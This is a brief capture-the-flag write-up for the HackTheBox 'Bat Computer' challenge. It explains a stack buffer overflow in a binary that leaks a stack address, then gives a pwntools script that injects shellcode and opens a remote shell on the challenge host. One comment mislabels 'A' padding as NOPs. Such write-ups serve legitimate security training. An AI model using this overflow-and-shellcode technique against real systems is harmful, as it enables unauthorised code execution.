We covered a binary that has only PIE or Position Independent Executable enabled as a protection while NX was disabled. We analyzed the binary with Ghidra and GDB. We discovered that the binary leaks the memory address of the variable used to store the user input. Based on that, we also found that the binary reads up to 137 bytes of user input and stores it in a variable whose buffer size is 76 bytes which is the core vulnerability of this app. We caused segmentation fault based on that and found the offset to be 84 bytes. Based on the analysis above, we built the exploitation script carrying the connection parameter and the final payload. This was part of HackTheBox Bat Computer | Intro to binary exploitation
Buffer Overflow Techniques Notes
Exploit Code is below
##Beginning
from pwn import *
context.binary = ELF(‘./batcomputer’)
con = remote(‘157.245.39.76’,31662)
con.sendline(‘1’)
con.recvuntil(‘0x’)
stack_base = int((“0x”+con.recv().decode(‘latin-1’).split()[0]),16)
log.success(f‘stack base: {hex(stack_base)}‘)
con.sendline(‘2’)
con.sendline(‘b4tp@$$w0rd!’)
payload = asm(shellcraft.popad() + shellcraft.sh()) # shellcode
payload += b‘A’*(84 – len(payload)) # nop
payload += p64(stack_base) # stack base
con.sendline(payload)
con.sendline(‘3’)
con.interactive()
##Ending
Video Walkthrough
